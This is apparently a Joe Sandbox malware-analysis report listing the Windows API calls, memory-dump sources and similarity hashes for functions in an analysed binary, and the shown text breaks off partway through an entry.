                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F161FB
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00F16229
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F16257
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F1628D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 768c531c8b0a2ac441eb5631365776a3c07969b8ec396791c710ec61c61181dc
                                                                                                                            • Instruction ID: f268c28b46a2c5f7e0f21da2450de426d9c39efdf62a846911d5e568313ffefe
                                                                                                                            • Opcode Fuzzy Hash: 768c531c8b0a2ac441eb5631365776a3c07969b8ec396791c710ec61c61181dc
                                                                                                                            • Instruction Fuzzy Hash: F031AE31A04286AFDF228F65CC44BFA7BA9BF42760F154029E864D71A1E731D990FB90
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32 ref: 00F64F02
                                                                                                                              • Part of subcall function 00F43641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F4365B
                                                                                                                              • Part of subcall function 00F43641: GetCurrentThreadId.KERNEL32 ref: 00F43662
                                                                                                                              • Part of subcall function 00F43641: AttachThreadInput.USER32(00000000,?,00F45005), ref: 00F43669
                                                                                                                            • GetCaretPos.USER32(?), ref: 00F64F13
                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00F64F4E
                                                                                                                            • GetForegroundWindow.USER32 ref: 00F64F54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2759813231-0
                                                                                                                            • Opcode ID: 6a6efd7b0ffeebf07d955c3082b365f33d3a19c47e60c3c7904a0de4f63ea18d
                                                                                                                            • Instruction ID: 55b62b94239af4492d09fdf2d6f64c96f03520dab9f1c59cefe43012d41cc691
                                                                                                                            • Opcode Fuzzy Hash: 6a6efd7b0ffeebf07d955c3082b365f33d3a19c47e60c3c7904a0de4f63ea18d
                                                                                                                            • Instruction Fuzzy Hash: 113130B1D00108AFCB00EFA6CD85DEFB7F9EF98300F10406AE415E7211DA759E458BA1
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F43C7A
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F43C88
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F43CA8
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F43D52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 420147892-0
                                                                                                                            • Opcode ID: 21745a22b63de72ef6268814fb634ae1a1908e9b4ad9e1e0656166f197180067
                                                                                                                            • Instruction ID: 466ea5d770475512ce18721396665ab93b012175637f082d30b5db13f7895534
                                                                                                                            • Opcode Fuzzy Hash: 21745a22b63de72ef6268814fb634ae1a1908e9b4ad9e1e0656166f197180067
                                                                                                                            • Instruction Fuzzy Hash: 2E31E3715083499FD300EF51D881ABFBBF8EF95354F40082CF892961A1EB719E49DB92
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6C4D2
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F1B9AB,?,?,?,?,?), ref: 00F6C4E7
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6C534
                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F1B9AB,?,?,?), ref: 00F6C56E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2864067406-0
                                                                                                                            • Opcode ID: babc8a47f7f024e1155febbb5634783b926287327c7664dc9bc7432db8d6ce13
                                                                                                                            • Instruction ID: 914a40c9c96b6c05e15fdd8fb582aaebe67a05090aec1bacf739a2e5944e43a8
                                                                                                                            • Opcode Fuzzy Hash: babc8a47f7f024e1155febbb5634783b926287327c7664dc9bc7432db8d6ce13
                                                                                                                            • Instruction Fuzzy Hash: 7A31D535500158AFCB15CF58CC58EFA7BB9EB0A720F484069F9868B261C731AD50EBE4
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F38121
                                                                                                                              • Part of subcall function 00F3810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F3812B
                                                                                                                              • Part of subcall function 00F3810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F3813A
                                                                                                                              • Part of subcall function 00F3810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38141
                                                                                                                              • Part of subcall function 00F3810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38157
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F386A3
                                                                                                                            • _memcmp.LIBCMT ref: 00F386C6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F386FC
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F38703
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1592001646-0
                                                                                                                            • Opcode ID: 3f828f7b3e70be0e7f1eb01c72c908bc3ed2752b345784a48d7f219e07b693a6
                                                                                                                            • Instruction ID: 01200ab262854589fa3f4e42533ce48f6760fdf6c44ad288d44932e25f7508a1
                                                                                                                            • Opcode Fuzzy Hash: 3f828f7b3e70be0e7f1eb01c72c908bc3ed2752b345784a48d7f219e07b693a6
                                                                                                                            • Instruction Fuzzy Hash: 6F21C171E00209EFDB00DFA4C949BEEB7B8FF41364F144059E414A7241DB34AE0AEB50
                                                                                                                            APIs
                                                                                                                            • __setmode.LIBCMT ref: 00F009AE
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            • _fprintf.LIBCMT ref: 00F009E5
                                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00F35DBB
                                                                                                                              • Part of subcall function 00F04AAA: _flsall.LIBCMT ref: 00F04AC3
                                                                                                                            • __setmode.LIBCMT ref: 00F00A1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 521402451-0
                                                                                                                            • Opcode ID: a912ef6553cff604a22c092d11a2c46b2c64f565f4a0954d12b76916879433d9
                                                                                                                            • Instruction ID: 85a441b6326240ad3a3790109d60117d1a2d5730a7137b73f4cde67e62f6eb04
                                                                                                                            • Opcode Fuzzy Hash: a912ef6553cff604a22c092d11a2c46b2c64f565f4a0954d12b76916879433d9
                                                                                                                            • Instruction Fuzzy Hash: BF1127B2A042486FD704B6B59C46ABEBBE99F41320F140015F204661D2EE296846B7A5
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F517A3
                                                                                                                              • Part of subcall function 00F5182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F5184C
                                                                                                                              • Part of subcall function 00F5182D: InternetCloseHandle.WININET(00000000), ref: 00F518E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463438336-0
                                                                                                                            • Opcode ID: 038ee64889fa3471cb9b4f06adeadb2059353fef44149983cea70ac551a6e9d7
                                                                                                                            • Instruction ID: af4437ec69d2874041c4cb9d653068e99d06733b1e5a74af7aff44bb752619e6
                                                                                                                            • Opcode Fuzzy Hash: 038ee64889fa3471cb9b4f06adeadb2059353fef44149983cea70ac551a6e9d7
                                                                                                                            • Instruction Fuzzy Hash: C621D736600605BFEB229F60DC00F7ABBA9FF49712F104129FF1196550D771A819B790
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(?,00F6FAC0), ref: 00F43A64
                                                                                                                            • GetLastError.KERNEL32 ref: 00F43A73
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F43A82
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F6FAC0), ref: 00F43ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2267087916-0
                                                                                                                            • Opcode ID: 6ccdc7fdd4f706268ea6562f1641cd75d765b7eaae1cb02b478df3d48f09e76b
                                                                                                                            • Instruction ID: b50766b4cfcffc51e6b3d307f3e49a8193d1193c280a9210c6d7ef36b1335cab
                                                                                                                            • Opcode Fuzzy Hash: 6ccdc7fdd4f706268ea6562f1641cd75d765b7eaae1cb02b478df3d48f09e76b
                                                                                                                            • Instruction Fuzzy Hash: 2621D6755482058FC300EF24D88186A7BE4FE55364F104A1DF8E9C72A1D735DE09DB42
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?), ref: 00F3F0CB
                                                                                                                              • Part of subcall function 00F3F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3F0F1
                                                                                                                              • Part of subcall function 00F3F0BC: lstrcmpiW.KERNEL32(00000000,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?), ref: 00F3F122
                                                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DCEC
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DD12
                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DD46
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                            • String ID: cdecl
                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                            • Opcode ID: b36e717f35aa9607b6ea46edc3e0bb50090486da5368de7623ada96166a95f80
                                                                                                                            • Instruction ID: c5f6bc22574ec9e6dc841419f9887eb91ace7e5f95931b963477caba6debe738
                                                                                                                            • Opcode Fuzzy Hash: b36e717f35aa9607b6ea46edc3e0bb50090486da5368de7623ada96166a95f80
                                                                                                                            • Instruction Fuzzy Hash: 1F11B136600305EBCB25AF34EC4597A77A9FF46360F80502AE806CB2A0EB71DC40E791
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00F15101
                                                                                                                              • Part of subcall function 00F0571C: __FF_MSGBANNER.LIBCMT ref: 00F05733
                                                                                                                              • Part of subcall function 00F0571C: __NMSG_WRITE.LIBCMT ref: 00F0573A
                                                                                                                              • Part of subcall function 00F0571C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 614378929-0
                                                                                                                            • Opcode ID: 95fdfb9dcfd4d88521c7cca40f0bc59673b76dc842e5524d90924c956727e30c
                                                                                                                            • Instruction ID: dddf2b65a9700313d9de8b0c1b27a02cc91fb84fddac4bea5357f375f4032b20
                                                                                                                            • Opcode Fuzzy Hash: 95fdfb9dcfd4d88521c7cca40f0bc59673b76dc842e5524d90924c956727e30c
                                                                                                                            • Instruction Fuzzy Hash: CB11E7B2900A15FECF222F74BC4679E37986B957B1B100529F944A62A0DE388881BB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 00F56399
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F563A4
                                                                                                                            • _memmove.LIBCMT ref: 00F563D1
                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00F563DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1504782959-0
                                                                                                                            • Opcode ID: da69b85c71ea2af7c8e0673070f146530c29eeaf50b7ef745ce5946b92bd11d7
                                                                                                                            • Instruction ID: 48221eae1b3e93f9557bec607245ada778784d0717cdf28631e4d4f3e1799e19
                                                                                                                            • Opcode Fuzzy Hash: da69b85c71ea2af7c8e0673070f146530c29eeaf50b7ef745ce5946b92bd11d7
                                                                                                                            • Instruction Fuzzy Hash: 1D116A32900109AFCB00FBA5ED46CEEB7F8AF04314B044075F915B7262DB30AE08EBA1
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F38B61
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38B73
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38B89
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38BA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 8ca62ea2c289bb88ad62b43121999c62c1e1c3ac701c86a44105e76a7d8c1f09
                                                                                                                            • Instruction ID: 38e98c53ec71c897854235c19d7ad3fd21347acaef47525621eb6086d12fb55a
                                                                                                                            • Opcode Fuzzy Hash: 8ca62ea2c289bb88ad62b43121999c62c1e1c3ac701c86a44105e76a7d8c1f09
                                                                                                                            • Instruction Fuzzy Hash: FD113A79900219FFDB11DB95CC84F9DFB78FB48350F204095E900B7250DA716E11EB94
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00EE12D8
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00F1B5FB
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F1B605
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F1B610
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4127811313-0
                                                                                                                            • Opcode ID: f7ba05a8f018e85b60fc33cc0c8b73d05b93b18bb0cd7336fd30a0475ab2c4d2
                                                                                                                            • Instruction ID: cdb8dcba1258c350003951cc6682bf9bd49eb1acdde066e844455f82f5d69d9c
                                                                                                                            • Opcode Fuzzy Hash: f7ba05a8f018e85b60fc33cc0c8b73d05b93b18bb0cd7336fd30a0475ab2c4d2
                                                                                                                            • Instruction Fuzzy Hash: E211283590005DEBCB00DFA9DC859EE77B8FB09301F400495FA12E7151C770AA95ABA5
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4115F
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F41184
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4118E
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F411C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875609808-0
                                                                                                                            • Opcode ID: d2d4f1c9551e3eae97817ab7bfe8b271923cfedfa28c6274beac5b0a7f3f7fde
